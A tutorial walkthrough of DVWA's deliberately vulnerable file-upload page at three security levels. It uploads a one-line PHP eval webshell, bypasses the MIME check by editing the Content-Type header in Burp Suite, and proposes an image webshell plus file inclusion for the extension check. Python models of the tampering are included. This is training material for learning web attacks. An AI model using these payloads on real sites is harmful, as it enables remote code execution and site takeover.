Attacking DVWA's file upload vulnerability with a one-line PHP webshell (一句话木马)


1. DVWA at the low security level, i.e. when the site places no restriction at all on the type of file uploaded. The source code is:

```php
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename( $_FILES['uploaded']['name']);

    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {

        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';

      } else {

        echo '<pre>';
        echo $target_path . ' succesfully uploaded!';
        echo '</pre>';
    }
}?>
```

A small PHP webshell script can be uploaded; it needs only the following line:

```php
<?php @eval($_POST['password']) ?>
```

Note that DVWA's success message echoes `$target_path`, so the response already tells you where the file was stored (`hackable/uploads/` plus the original file name). After crawling the site to map its directory structure, open the uploaded file's URL in China Chopper (中国菜刀) or a similar client, using as the password the name of the POST parameter written into the script (`password` here). That gives you a backdoor into the site from which you can freely upload, download and browse its files.

2. At the medium security level, a MIME-type restriction is applied to the uploaded file. The source code is:

```php
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_type = $_FILES['uploaded']['type'];
    $uploaded_size = $_FILES['uploaded']['size'];

    if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {

            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';

          } else {

            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';

            }
    }
    else{
        echo '<pre>Your image was not uploaded.</pre>';
    }
}?>
```

With the added condition that only the image/jpeg MIME type passes (for the list of MIME types, see the W3C MIME reference manual), our .php script can no longer be uploaded. But the value being checked, `$_FILES['uploaded']['type']`, is just the Content-Type header the client wrote on the file part of the multipart request; the server never verifies it against the file's contents. So use Burp Suite, which ships with the Kali attack machine, as an intercepting proxy: configure the browser to send its traffic through it (how to set the proxy up, and how to make Burp proxy traffic from the physical host, will be covered in a later post), intercept the request that submits the file, and you will see that the file part's Content-Type is application/octet-stream. Change it to image/jpeg and forward the request: the .php file is uploaded successfully and we have bypassed this layer.
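The request tampering described above, modelled offline in Python as an added example (it is not code from the page or from DVWA): it builds the multipart/form-data body the browser submits, applies the single Content-Type edit made in Burp, and runs both versions through a minimal multipart parser plus re-implementations of DVWA's low and medium checks. The boundary string, the parser and the check functions are constructed for this example; the point it makes is that `$_FILES['uploaded']['type']` is copied from a client-supplied header.

```python
import re

# Boundary string as a browser might generate it (constructed for this example).
BOUNDARY = "----WebKitFormBoundary7MA4YWxkTrZu0gW"
# The one-line webshell from the page; 'password' is the POST parameter the client uses.
ONE_LINER = b"<?php @eval($_POST['password']); ?>\n"


def build_upload_body(filename: str, content: bytes, part_type: str) -> bytes:
    """Body of the multipart/form-data POST a browser sends to DVWA's upload form.

    part_type is the Content-Type the client writes on the file part. PHP copies
    that header verbatim into $_FILES['uploaded']['type'], so the "medium" check
    below is testing an attacker-controlled value.
    """
    crlf = b"\r\n"
    delim = b"--" + BOUNDARY.encode()
    return b"".join([
        delim + crlf,
        b'Content-Disposition: form-data; name="MAX_FILE_SIZE"' + crlf + crlf,
        b"100000" + crlf,
        delim + crlf,
        b'Content-Disposition: form-data; name="uploaded"; filename="'
        + filename.encode() + b'"' + crlf,
        b"Content-Type: " + part_type.encode() + crlf + crlf,
        content + crlf,
        delim + crlf,
        b'Content-Disposition: form-data; name="Upload"' + crlf + crlf,
        b"Upload" + crlf,
        delim + b"--" + crlf,
    ])


def parse_multipart(body: bytes) -> dict:
    """Minimal server-side view: what PHP exposes as $_FILES and $_POST.

    Handles only the flat form this example builds (no nested multipart, no
    quoted-string escapes); it exists to show where 'type' and 'size' come from.
    """
    delim = b"--" + BOUNDARY.encode()
    files, post = {}, {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):                        # closing "--boundary--"
            break
        head, _, data = chunk[2:].partition(b"\r\n\r\n")   # drop CRLF after delimiter
        data = data[:-2]                                   # drop CRLF before next one
        headers = {}
        for line in head.decode().split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        disposition = headers.get("content-disposition", "")
        name = re.search(r'; name="([^"]*)"', disposition).group(1)
        fname = re.search(r'filename="([^"]*)"', disposition)
        if fname:
            files[name] = {"name": fname.group(1),
                           "type": headers.get("content-type", ""),  # client-supplied
                           "size": len(data),                        # measured by server
                           "data": data}
        else:
            post[name] = data.decode()
    return {"files": files, "post": post}


def dvwa_low_accepts(req: dict) -> bool:
    """Low level: anything goes once the form's Upload button was pressed."""
    return "Upload" in req["post"] and "uploaded" in req["files"]


def dvwa_medium_accepts(req: dict) -> bool:
    """Medium level: ($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)."""
    if "Upload" not in req["post"] or "uploaded" not in req["files"]:
        return False
    f = req["files"]["uploaded"]
    return f["type"] == "image/jpeg" and f["size"] < 100000


def spoof_content_type(body: bytes) -> bytes:
    """The single edit made in Burp's Proxy tab: relabel the file part as JPEG."""
    return body.replace(b"Content-Type: application/octet-stream\r\n",
                        b"Content-Type: image/jpeg\r\n", 1)


def demo() -> dict:
    as_sent = build_upload_body("shell.php", ONE_LINER, "application/octet-stream")
    tampered = spoof_content_type(as_sent)
    stored = parse_multipart(tampered)["files"]["uploaded"]
    return {
        "low_accepts_php": dvwa_low_accepts(parse_multipart(as_sent)),
        "medium_rejects_untampered": not dvwa_medium_accepts(parse_multipart(as_sent)),
        "medium_accepts_tampered": dvwa_medium_accepts(parse_multipart(tampered)),
        # Name and bytes are untouched: still shell.php, still PHP code on disk.
        "stored_name": stored["name"],
        "stored_is_php": stored["data"].startswith(b"<?php"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Only the part header changes between the two requests; the file name and the PHP bytes that end up under `hackable/uploads/` are identical, which is why the medium level offers no real protection once a proxy is in the path.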

3. Finally, the high security level. The source code is:

```php
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];

    if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" ||
         $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {

            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';

          } else {

            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';

            }
    }

    else{

        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';

    }
}?>
```

This time the filtering is no longer by MIME type: the upload only succeeds if the file name carries one of the fixed image extensions (jpg/JPG/jpeg/JPEG). Even if you intercept the request with Burp and change the file's extension, you cannot take control of the server through Chopper, because a PHP file renamed to a .jpg extension is not parsed as PHP by the server. Note also that the check only looks at the characters after the last dot, so a name like shell.php.jpg is accepted too, but it is still served as an image rather than executed. The way forward is an image webshell: use an image-webshell tool to insert the one-liner above into a picture, upload the picture, and then use a file inclusion vulnerability to get the embedded code executed. That step, together with an analysis of file inclusion, will be covered in a later post.
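The extension check and the image-webshell idea above, as an added Python example (not code from the page or from DVWA). It reproduces `substr($uploaded_name, strrpos($uploaded_name, '.') + 1)` including PHP's `false + 1` quirk for dotless names, builds a minimal constructed JPEG with the one-liner appended after the EOI marker, and reports for each upload attempt whether the high check accepts it, whether a default Apache/mod_php setup would hand it to PHP (an assumption, stated in the code), and whether the bytes still look like a JPEG. The file names, the JPEG bytes and the `served_as_php` rule are assumptions made for illustration.

```python
# DVWA "high" upload check and the image webshell it pushes the attacker toward,
# modelled offline. Everything here is constructed for the example.

ONE_LINER = b"<?php @eval($_POST['password']); ?>"

# Constructed minimal JPEG container: SOI, a JFIF APP0 segment, EOI. Not a viewable
# picture, but it starts with the FF D8 magic that a signature check looks for.
MINIMAL_JPEG = (
    b"\xff\xd8"                                                      # SOI
    b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"  # APP0, length 16
    b"\xff\xd9"                                                      # EOI
)


def dvwa_high_extension(uploaded_name: str) -> str:
    """substr($uploaded_name, strrpos($uploaded_name, '.') + 1) from the page.

    Only the text after the LAST dot is examined. PHP's strrpos() returns false
    when there is no dot, and false + 1 == 1, so a dotless name is checked from
    its second character onward; that quirk is reproduced here.
    """
    pos = uploaded_name.rfind(".")
    start = (pos if pos != -1 else 0) + 1
    return uploaded_name[start:]


def dvwa_high_accepts(uploaded_name: str, size: int) -> bool:
    """The page's condition: extension in {jpg, JPG, jpeg, JPEG} and size < 100000."""
    return (dvwa_high_extension(uploaded_name) in ("jpg", "JPG", "jpeg", "JPEG")
            and size < 100000)


def served_as_php(stored_name: str) -> bool:
    """Assumption: a default Apache + mod_php mapping, where only a trailing .php
    makes the server hand the file to the PHP engine. A .jpg (even shell.php.jpg)
    is returned as static bytes, which is why a renamed script gives Chopper
    nothing to talk to."""
    return stored_name.lower().endswith(".php")


def make_image_webshell(image: bytes, payload: bytes) -> bytes:
    """Append the one-liner after the JPEG's EOI marker, as an image-webshell tool
    does. The file keeps its JPEG magic and passes the extension check as
    name.jpg; if a file-inclusion bug later include()s it, PHP emits the binary
    prefix as-is and executes the <?php ... ?> block."""
    return image + payload


def is_jpeg(data: bytes) -> bool:
    return data[:2] == b"\xff\xd8"


def carries_php(data: bytes) -> bool:
    return b"<?php" in data


def demo() -> dict:
    """Run the upload attempts discussed on the page against the high-level check."""
    attempts = (
        ("shell.php", ONE_LINER),                                   # plain webshell
        ("shell.jpg", ONE_LINER),                                   # renamed in Burp
        ("shell.php.jpg", ONE_LINER),                               # double extension
        ("cat.jpg", make_image_webshell(MINIMAL_JPEG, ONE_LINER)),  # image webshell
    )
    return {
        name: {
            "accepted": dvwa_high_accepts(name, len(data)),
            "served_as_php": served_as_php(name),
            "looks_like_jpeg": is_jpeg(data),
            "carries_php": carries_php(data),
        }
        for name, data in attempts
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```

Running it shows why the page moves on to file inclusion: the renamed and double-extension uploads are accepted but never reach the PHP engine, and cat.jpg is accepted while keeping both its magic bytes and the payload, so the embedded code only runs once something on the server include()s that file.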


It is never too late to learn